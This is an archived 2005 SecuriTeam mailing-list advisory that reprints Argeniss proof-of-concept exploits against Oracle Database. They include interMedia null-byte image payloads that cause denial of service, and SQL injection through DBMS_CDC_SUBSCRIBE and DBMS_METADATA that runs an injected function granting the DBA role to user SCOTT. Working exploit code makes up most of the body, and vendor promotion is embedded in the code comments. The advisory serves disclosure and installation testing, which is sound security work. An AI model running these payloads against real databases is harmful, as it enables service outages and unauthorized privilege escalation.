[EXPL] Multiple Exploit Codes for Oracle (interMedia, DBMS_CDC_SUBSCRIBE, DBMS_CDC_ISUBSCRIBE and DBMS_METADATA)

From: SecuriTeam (support_at_securiteam.com)
Date: 04/21/05

  • Next message: support_at_securiteam.com: "[NT] Windows File Selection May Lead to Command Execution" 
    To: list@securiteam.com
Date: 21 Apr 2005 16:40:04 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Multiple Exploit Codes for Oracle (interMedia, DBMS_CDC_SUBSCRIBE,
    DBMS_CDC_ISUBSCRIBE and DBMS_METADATA)
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous articles:
    <http://www.securiteam.com/securitynews/5YP0S0AFGK.html> Oracle interMedia
    DoS, <http://www.securiteam.com/securitynews/5VP0P0AFGM.html> Multiple
    SQL Injection Vulnerabilities in DBMS_CDC_SUBSCRIBE and
    DBMS_CDC_ISUBSCRIBE Packages and
    <http://www.securiteam.com/securitynews/5UP0O0AFGO.html> Multiple SQL
    Injection Vulnerabilities in DBMS_METADATA Package, multiple
    vulnerabilities have been discovered in Oracle. The following exploit code
    can be used to test your Oracle installation for the mentioned
    vulnerabilities.

    DETAILS

    Exploit for Oracle interMedia DoS:
    /*
       Argeniss - Information Security
       http://www.argeniss.com
       info>at<argeniss>dot<com

       You think you are secure because you are running the unbreakable
    Oracle, you think you are secure because you are up to date with patches,
    you think you are secure because etc., etc......
       You are wrong, Oracle software is so buggy that it can be owned in five
    seconds bypassing all protection mechanisms. Think how much money you will
    loose when your corporate data is compromised.
       There are still dozens of unpatched vulnerabilities. The best
    protection is eliminating vulnerabilities.
       Join AVI service now and be safe http://www.argeniss.com/services.html
       Find out the special offer for Oracle vulnerability pack, it includes
    all unpatched Oracle vulnerability information with workaround scripts
    ready to apply.

       Proof of concept exploit code for the Denial of Service vulnerability
    in Oracle InterMedia.
       http://www.argeniss.com/research.html
       By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

      These exploits makes the Oracle process to consume 100% CPU usage.
    */

    -- Exploit 1: Explicitly setting two null bytes to localData property
    DECLARE
      Image ORDSYS.ORDImage;
    BEGIN
      Image := ORDSYS.ORDImage.init();
      Image.source.localData := TO_BLOB(HEXTORAW('0000'));
      Image.setProperties;
    END;
    /

    -- Exploit 2: Loading from filesystem
    DECLARE
      Image ORDSYS.ORDImage;
    BEGIN
      Image := ORDSYS.ORDImage.init('file', 'MEDIA_DIR',
    'file_with_two_null_bytes.jpg');
      Image.setProperties;
    END;
    /

    -- Exploit 3: Loading from web
    DECLARE
      Image ORDSYS.ORDImage;
    BEGIN
      Image := ORDSYS.ORDImage.init('HTTP', 'www.someserver.com/',
       'file_with_two_null_bytes.jpg');
      Image.setProperties;
    END;
    /

    -- Exploit 4: Explicitly setting two null bytes to localData property of
    ORDDoc type.
    DECLARE
      Doc ORDSYS.ORDDoc;
      R RAW(30000);
    BEGIN
      Doc := ORDSYS.ORDDoc.init();
      Doc.source.localData := TO_BLOB(HEXTORAW('0000'));
      Doc.setProperties (R, FALSE);
    END;
    /

    Exploit for DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE packages:
    /*
       Argeniss - Information Security
       http://www.argeniss.com
       info>at<argeniss>dot<com

       You think you are secure because you are running the unbreakable
    Oracle, you think you are secure because you are up to date with patches,
    you think you are secure because etc., etc......
       You are wrong, Oracle software is so buggy that it can be owned in five
    seconds bypassing all protection mechanisms. Think how much money you will
    loose when your corporate data is compromised.
       There are still dozens of unpatched vulnerabilities. The best
    protection is eliminating vulnerabilities.
       Join AVI service now and be safe http://www.argeniss.com/services.html
       Find out the special offer for Oracle vulnerability pack, it includes
    all unpatched Oracle vulnerability information with workaround scripts
    ready to apply.

       Proof of concept exploit code for the SQL Injection vulnerability in
    Oracle
       Database Server standard packages SYS.DBMS_CDC_SUBSCRIBE and
       SYS.DBMS_CDC_ISUBSCRIBE (parameter SUBSCRIPTION_NAME).
       http://www.argeniss.com/research.html
       By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

       This exploit grants the DBA role to the user SCOTT.
       Required privileges: Database user with privileges to create or modify
    functions.
       For more information on SQL injection issues in Oracle and how this
    exploit works
       see the Advanced SQL Injection in Oracle databases presentation
    available at
       http://www.argeniss.com/research.html
    */

    -- First we create the function to be injected and executed as the SYS
    user.
    CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
     authid current_user as
     pragma autonomous_transaction;
    BEGIN
      EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
      COMMIT;
      RETURN '';
    END;
    /

    -- Inject the function in the vulnerable procedure
    BEGIN
      
    SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACKER_FUNC()||''');
    END;
    /

    Exploit for DBMS_METADATA package:
    /*
       Argeniss - Information Security
       http://www.argeniss.com
       info>at<argeniss>dot<com

       You think you are secure because you are running the unbreakable
    Oracle, you think you are secure because you are up to date with patches,
    you think you are secure because etc., etc......
       You are wrong, Oracle software is so buggy that it can be owned in five
    seconds bypassing all protection mechanisms. Think how much money you will
    loose when your corporate data is compromised.
       There are still dozens of unpatched vulnerabilities. The best
    protection is eliminating vulnerabilities.
       Join AVI service now and be safe http://www.argeniss.com/services.html
       Find out the special offer for Oracle vulnerability pack, it includes
    all unpatched Oracle vulnerability information with workaround scripts
    ready to apply.

       Proof of concept exploit code for the SQL Injection vulnerability in
    Oracle
       Database Server standard package DBMS_METADATA.
       http://www.argeniss.com/research.html
       By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

       This exploit grants the DBA role to the user SCOTT.
       Required privileges: Database user with privileges to create or modify
    functions.
       For more information on SQL injection issues in Oracle and how this
    exploit works
       see the Advanced SQL Injection in Oracle databases presentation
    available at
       http://www.argeniss.com/research.html
    */

    -- First we create the function to be injected and executed as the SYS
    user.
    CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
     authid current_user as
     pragma autonomous_transaction;
    BEGIN
      EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
      COMMIT;
      RETURN '';
    END;
    /

    -- Inject the function in the vulnerable procedure
    SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACKER_FUNC()||''','') FROM
    dual;
    /

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:cesarc56@yahoo.com> Cesar.
    The original article can be found at:
    <http://www.argeniss.com/research.html>
    http://www.argeniss.com/research.html

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: support_at_securiteam.com: "[NT] Windows File Selection May Lead to Command Execution"

    Relevant Pages

    • Re: Pentesting tool - Commercial
      ... I common approach is to do a full test using a lot of tools that address known vulnerabilities, common design flaws and such - in combination with penetration testing tools to sort of false positives and confirm what sort of consequences a breach would have. ... In combination with firewall policy analyzes, looking at the routines surrounding security all the way from development to maintenance you'll have some sort of baseline to work out from when it comes to the level of security. ... I want them to acquire secure software and use it ...
      (Pen-Test)
    • Re: Your Opinion +
      ... and RealNetworks regarding Windows Media Player back in 2003, lets say for discussion, MS now turn around and offer up their 'Security Applications' for free. ... Those things aren't even usually called "security software" -- for example, use of Mozilla-based browser makes Windows desktop more secure not because Mozilla-based browsers are designed as "security software" but because it allows the user to not use Internet Explorer, and it contains less, shorter living or easier to avoid vulnerabilities than the product it replaces. ... Software that runs on potentially compromised computers looking for signatures, altered files, inconsistent responses from system interfaces and other evidence of compromise. ...
      (Bugtraq)
    • CanSecWest 2008 Mar 26-28
      ... Cross-Site Scripting Vulnerabilities in Flash Authoring Tools - Rich   ... Secure programming with gcc and glibc - Marcel Holtmann, ... Fuzz by Number - Charlie Miller, Independent Security Evaluators ... Vulnerabilities Die Hard - Kowsik Guruswamy, ...
      (Pen-Test)
    • Fwd: CERT Advisory CA-2003-05 Multiple Vulnerabilities in Oracle Servers
      ... Multiple vulnerabilities exist in Oracle software that may lead to ... Multiple vulnerabilities exist in Oracle9i Application Server, ... Oracle has published Security Alerts describing these vulnerabilities. ... Any material furnished by Carnegie Mellon University and the Software ...
      (Bugtraq)
    • [NEWS] CERT advisory: Multiple vulnerabilities in Oracle Servers
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities in Oracle Application Server have recently ... Oracle Application Server includes a web server based on the Apache ... VU#500203 - Oracle9i Application Server Apache PL/SQL module ...
      (Securiteam)